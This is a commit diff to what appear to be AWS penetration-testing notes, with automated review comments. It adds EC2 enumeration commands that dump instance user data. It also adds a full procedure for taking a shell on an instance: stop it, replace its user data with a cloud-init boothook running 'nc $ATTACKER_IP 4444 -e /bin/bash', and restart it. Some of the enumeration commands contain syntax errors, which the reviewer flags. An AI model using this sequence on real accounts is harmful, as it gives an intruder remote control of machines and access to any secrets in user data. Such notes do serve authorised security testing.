added more details about the EC2 connections
parent 4032ccbcad
commit 1f86484039
@ -700,6 +700,27 @@ Deploy service instances of Virtual machines inside a VPC.
Deployment EC2 instances into 26 regions. Supports multiple OSs.
On-demand billing.

#### Enumerate EC2 Instances

List EC2 instances in the account via aws cli.

```sh
aws ec2 describe-instances --query 'Reservations[*].Instances[*].Tags[?Key==`Name`].Value,InstanceId,State.Name,InstanceType,PublicIpAddress,PrivateIpAddress]' --profile PROFILENAME --output json
```
List all InstanceIds in the account via aws cli.

```sh
list=$(aws ec2 describe-instances --region <region_name> --query Reservations[].Instances.InstanceId --output json --profile PROFILENAME) | jq .[] -r
```

Get user data like cloud-init scripts from the instances via aws cli.

```sh
for i in $list;do
aws ec2 describe-instance-attribute --profile PROFILENAME --instance-id $i --attribute userData --output text --query UserData --region <region_name> | base64 -d | > $i-userdata.txt
done
```

#### Connect to an EC2 Instance

Connect to the instance using SSH, RDP, SSM, serial console or webconsole.

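Review bot: the `describe-instances` query in the first block has an unbalanced multi-select bracket: the list after `Instances[*].` closes with `]` but never opens, so the CLI rejects the JMESPath expression. Insert `[` directly after `Instances[*].` so the projection becomes a multi-select list `[Tags[?Key==...].Value,InstanceId,State.Name,InstanceType,PublicIpAddress,PrivateIpAddress]`. The second block has two problems: `Reservations[].Instances.InstanceId` is missing `[]` after `Instances` (it is an array), and the `| jq .[] -r` is applied to the output of the assignment (nothing) rather than to the API response, so `list` ends up holding the raw JSON array and `for i in $list` later iterates over bracket and comma fragments. A single `list=$(aws ec2 describe-instances --region <region_name> --query 'Reservations[].Instances[].InstanceId' --output text --profile PROFILENAME)` yields whitespace-separated IDs and drops the jq step. In the third block, `| base64 -d | > $i-userdata.txt` has a stray pipe before the redirect; it should be `| base64 -d > "$i-userdata.txt"`, and `--query UserData.Value` selects the base64 string directly instead of the enclosing object.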
@ -725,6 +746,42 @@ Instance Connect and the SSM Session Manager can be used to reset the root
password via `sudo passwd root`. After that it is possible to connect to the
root user, e.g. using serial console or just use `sudo su root` or `su root` directly.

##### Connect to an EC2 Instance Using a Reverse Shell

The InstanceId has to be known, watch [Enumerate EC2 Instances](#Enumerate-EC2-Instances) to get these IDs.

Stop the machine using the InstanceId through aws cli.

```sh
aws ec2 stop-instances --profile PROFILENAME --instance-ids $INSTANCE_ID
```

Creat a cloud-init script which contains the reverse shell. The file should contain somethin like the following example, so it will executed at boot time.

```sh
#cloud-boothook
#!/bin/bash -x
apt install -y netcat-traditional && nc $ATTACKER_IP 4444 -e /bin/bash
```

Encode the shellscript via base64.

```sh
base64 rev.txt > rev.b64
```

Upload the encoded file to the stopped instance via aws cli.

```sh
aws ec2 modify-instance-attribute --profile PROFILENAME --instance-id $INSTANCE_ID --attribute userData --value file://rev.b64
```

Start the instance with the uploaded file included via aws cli. Wait for the reverse shell to catch up.

```sh
aws ec2 start-instances --profile PROFILENAME --instance-ids $INSTANCE_ID
```

#### EC2 and IAM

EC2 instances can use nearly any other service provided by AWS.

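Review bot: several typos in the new prose: "Creat" should be "Create", "somethin" should be "something", "so it will executed" should be "so it will be executed", and "watch [Enumerate EC2 Instances]" reads better as "see [Enumerate EC2 Instances]". The cross-reference anchor `#Enumerate-EC2-Instances` is unlikely to resolve, since generated heading ids are lowercased; use `#enumerate-ec2-instances`. The `stop-instances`, `modify-instance-attribute` and `start-instances` commands omit `--region`, whereas the enumeration commands above pass `--region <region_name>`; keep this consistent. For the reader's benefit, the section should also state the operational caveats this sequence carries: stopping the instance interrupts whatever it is running, the modified user data stays readable via `describe-instance-attribute`, and all three API calls are recorded as CloudTrail management events, so this is a noisy technique from a detection standpoint.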
@ -925,3 +982,4 @@ List available load-balancers via aws cli.
```sh
aws elbv2 describe-load-balancers --query Loadbalancers[].DNSName --output text
```

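Review bot: the JMESPath query `Loadbalancers[].DNSName` uses the wrong key case; the `elbv2 describe-load-balancers` response key is `LoadBalancers`, and JMESPath is case-sensitive, so this returns nothing. It should be `--query 'LoadBalancers[].DNSName'`. Also, this is the only command in the section without `--profile PROFILENAME`; add it for consistency with the rest of the file.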